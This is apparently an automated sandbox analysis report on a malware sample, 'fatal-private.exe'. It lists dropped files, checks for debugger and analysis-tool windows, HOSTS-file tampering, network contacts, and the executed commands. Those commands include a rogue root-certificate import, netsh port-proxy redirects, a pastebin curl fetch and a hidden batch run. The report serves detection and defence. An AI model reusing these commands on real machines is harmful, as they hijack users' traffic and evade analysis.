Technical Information
Malicious functions
Searches for windows to
detect analytical utilities:
- ClassName: 'OLLYDBG', WindowName: ''
Modifies file system
Creates the following files
- %TEMP%\autb84.tmp
- %TEMP%\etilqs_9aukitrwv39swq4
- %TEMP%\etilqs_effepkllqnih9an
- %TEMP%\etilqs_bfefa3cm9g6llbb
- %TEMP%\etilqs_rn9eyqxwybdjfkj
- %TEMP%\etilqs_k10wioubt0idyfb
- %TEMP%\etilqs_yva6bqub0pjutfr
- %TEMP%\1bd2.tmp
- %TEMP%\etilqs_juacgj9ovtqnw3m
- %TEMP%\etilqs_gn5x9ltcjbfhgjl
- %TEMP%\etilqs_en0mdcm619inubr
- %TEMP%\etilqs_awf4fvzrp1fuwyh
- %LOCALAPPDATA%\k.bat
- %TEMP%\aut1342.tmp
- %TEMP%\fatal-private.exe
- nul
- %TEMP%\1bd3.tmp
Deletes the following files
- %TEMP%\autb84.tmp
- %TEMP%\aut1342.tmp
- %LOCALAPPDATA%\k.bat
- %TEMP%\1bd2.tmp
- %TEMP%\1bd3.tmp
Modifies the HOSTS file.
Network activity
Connects to
- 'google.com':80
- 'localhost':49262
- 'localhost':49260
- 'do#####d3.operacdn.com':443
- 'sd#####es.operacdn.com':443
- 'fa###ook.com':443
- 'fa###ook.com':80
- 'di##ord.gg':443
- 'ya###.opera.com':80
- 'si#####ck2.opera.com':443
- 're###.opera.com':80
- 'si#####ck2.opera.com':80
- 'en.###ipedia.org':443
- 'en.###ipedia.org':80
- 'se####.yahoo.com':443
- 'am##on.com':443
- 'au######te.geo.opera.com':443
- 'bing.com':80
- 'am##on.com':80
- 'du###uckgo.com':443
- 'au######te.geo.opera.com':80
- 'se####.yahoo.com':80
- 'ke##uth.win':443
- '<LOCALNET>.11.37':443
TCP
HTTP GET requests
- http://www.google.com/favicon.ico
- http://re###.opera.com/speeddials/partner/product
- http://re###.opera.com/speeddials/partner/booking_com_us
- http://re###.opera.com/speeddials/partner/twitter_us
- http://re###.opera.com/speeddials/partner/yahoo
- http://re###.opera.com/speeddials/partner/ebay_us
- http://re###.opera.com/speeddials/partner/amazon_us
- http://www.fa###ook.com/
- http://re###.opera.com/speeddials/partner/youtube
- http://re###.opera.com/speeddials/partner/facebook
- http://re###.opera.com/www.opera.com/firstrun/
- http://si#####ck2.opera.com/?ho###################################################
- http://en.###ipedia.org/favicon.ico
- http://www.bing.com/s/a/bing_p.ico
- http://www.am##on.com/favicon.ico
- http://se####.yahoo.com/favicon.ico
- http://au######te.geo.opera.com/geolocation/
- http://ya###.opera.com/favicon.ico
- http://re###.opera.com/speeddials/partner/wikipedia_org_us
Other
- 'du###uckgo.com':443
- 'localhost':49263
- 'localhost':49262
- 'localhost':49260
- 'do#####d3.operacdn.com':443
- 'sd#####es.operacdn.com':443
- 'fa###ook.com':443
- 'ke##uth.win':443
- 'op##a.com':443
- 'ya###.opera.com':443
- 'si#####ck2.opera.com':443
- 'en.###ipedia.org':443
- 'se####.yahoo.com':443
- 'am##on.com':443
- 'au######te.geo.opera.com':443
- 'di##ord.gg':443
- '<LOCALNET>.11.37':443
UDP
- DNS ASK en.###ipedia.org
- DNS ASK sd#####es.operacdn.com
- DNS ASK fa###ook.com
- DNS ASK di##ord.gg
- DNS ASK op##a.com
- DNS ASK ya###.opera.com
- DNS ASK re###.opera.com
- DNS ASK si#####ck2.opera.com
- DNS ASK ke##uth.win
- DNS ASK bi##.#ikimedia.org
- DNS ASK bing.com
- DNS ASK am##on.com
- DNS ASK du###uckgo.com
- DNS ASK se####.yahoo.com
- DNS ASK au######te.geo.opera.com
- DNS ASK google.com
- DNS ASK do#####d3.operacdn.com
- 'localhost':64746
Miscellaneous
Searches for the following windows
- ClassName: 'Opera_MessageWindow' WindowName: '%APPDATA%\Opera Software\Opera Stable'
- ClassName: 'WinListerMain' WindowName: ''
- ClassName: 'ID' WindowName: ''
- ClassName: 'x64dbg' WindowName: ''
- ClassName: 'XTPMainFrame' WindowName: ''
- ClassName: 'Progress Telerik Fiddler Classic' WindowName: ''
- ClassName: 'The Wireshark Network Analyzer' WindowName: ''
- ClassName: 'SunAwtFrame' WindowName: ''
- ClassName: 'The Interactive Dissembler' WindowName: ''
- ClassName: 'IDA v' WindowName: ''
- ClassName: 'ida64' WindowName: ''
Creates and executes the following
- '%TEMP%\fatal-private.exe'
- '%TEMP%\fatal-private.exe' 3428
- '%WINDIR%\syswow64\cmd.exe' /c %LOCALAPPDATA%\k.bat' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /c %LOCALAPPDATA%\k.bat
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.6.315397323\229180363" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.7.764465488\630352264" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.8.170670964\1053318140" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera_crashreporter.exe' --type=utility --channel="2876.4.1644801679\672980057" --lang=en-US --no-sandbox --enable-proprietary-media-types-playback /prefetch:-645351001 /crash-reporter-parent-id=1888
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.9.1787241317\2131108185" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.10.1015003953\522010583" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.4.1644801679\672980057" --lang=en-US --no-sandbox --enable-proprietary-media-types-playback /prefetch:-645351001
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.5.534682749\1423778838" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.11.105359283\2120541637" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001
- '%WINDIR%\syswow64\ipconfig.exe' /flushdns
- '<SYSTEM32>\cmd.exe' /c certutil -hashfile "%TEMP%\Fatal-Private.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
- '<SYSTEM32>\certutil.exe' -hashfile "%TEMP%\Fatal-Private.exe" MD5
- '<SYSTEM32>\find.exe' /i /v "md5"
- '<SYSTEM32>\find.exe' /i /v "certutil"
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.16.1944470022\1760537212" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.12.1755772901\837564539" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.15.358362856\680489109" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=renderer --alt-high-dpi-setting=96 --disable-direct-npapi-requests --enable-deferred-image-decoding --lang=en-US --enable-proprietary-media-types-playback --extension-process --enable-we...
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=renderer --alt-high-dpi-setting=96 --disable-direct-npapi-requests --enable-deferred-image-decoding --lang=en-US --enable-proprietary-media-types-playback --disable-client-side-phishing-...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -Command "Import-Certificate -FilePath '%TEMP%\server.crt' -CertStoreLocation 'Cert:\LocalMachine\Root' -ErrorAction SilentlyContinue"
- '%WINDIR%\syswow64\net.exe' start iphlpsvc
- '%WINDIR%\syswow64\net1.exe' start iphlpsvc
- '%WINDIR%\syswow64\cmd.exe' /c curl -s https://pastebin.com/raw/sD69ivJ5
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' -noautoupdate --ran-launcher -- https://discord.gg/fatalservices
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" echo "
- '%WINDIR%\syswow64\findstr.exe' /R "^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*$"
- '%WINDIR%\syswow64\netsh.exe' int ip add addr 1 51.79.86.198/32 st=ac sk=tr
- '%ProgramFiles(x86)%\opera\launcher.exe' -noautoupdate -- "https://discord.gg/fatalservices"
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera_crashreporter.exe' -noautoupdate --ran-launcher -- https://discord.gg/fatalservices /crash-reporter-parent-id=2876
- '%WINDIR%\syswow64\netsh.exe' int ip add addr 1 104.26.1.5/32 st=ac sk=tr
- '%WINDIR%\syswow64\netsh.exe' int ip add addr 1 104.26.0.5/32 st=ac sk=tr
- '%WINDIR%\syswow64\netsh.exe' interface portproxy add v4tov4 listenport=80 listenaddress=0.0.0.0 connectport=80 connectaddress=
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=gpu-process --channel="2876.0.1063720798\587710536" --enable-proprietary-media-types-playback --supports-dual-gpus=false --gpu-driver-bug-workarounds=1,19,42 --gpu-vendor-id=0x0000 --gpu...
- '%WINDIR%\syswow64\netsh.exe' interface portproxy add v4tov4 listenport=443 listenaddress=0.0.0.0 connectport=443 connectaddress=
- '%WINDIR%\syswow64\certutil.exe' -store TrustedRoot
- '%WINDIR%\syswow64\findstr.exe' /i /c:"%TEMP%\server.crt"
- '%WINDIR%\syswow64\netsh.exe' int ip add addr 1 172.67.72.57/32 st=ac sk=tr
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.17.1990539497\496958295" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.18.1804343518\652121414" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001
